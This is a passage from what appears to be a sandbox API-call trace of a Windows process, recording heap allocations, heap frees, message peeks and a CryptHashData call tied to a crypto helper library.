lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0204.519] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.519] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0204.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0204.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0204.519] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.520] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0204.520] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0204.520] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0204.520] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0204.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0204.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0204.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0204.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0204.521] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.521] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0204.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0204.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c68 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.522] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0204.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0204.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0204.522] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0204.523] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.523] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0204.524] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0204.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0204.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e50c98 [0204.525] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0204.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0204.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0204.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0204.525] CryptHashData (hHash=0xa87610, pbData=0x2e54e08, dwDataLen=0x3, dwFlags=0x1) returned 1 [0204.525] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b88 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0204.526] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0204.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.527] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0204.527] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0204.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50bc0 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0204.528] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0204.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0204.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0204.529] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c20 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.529] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0204.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0204.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0204.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0204.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0204.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0204.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0204.530] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0204.530] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0204.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0204.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0204.531] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0204.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0204.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0204.531] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0204.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 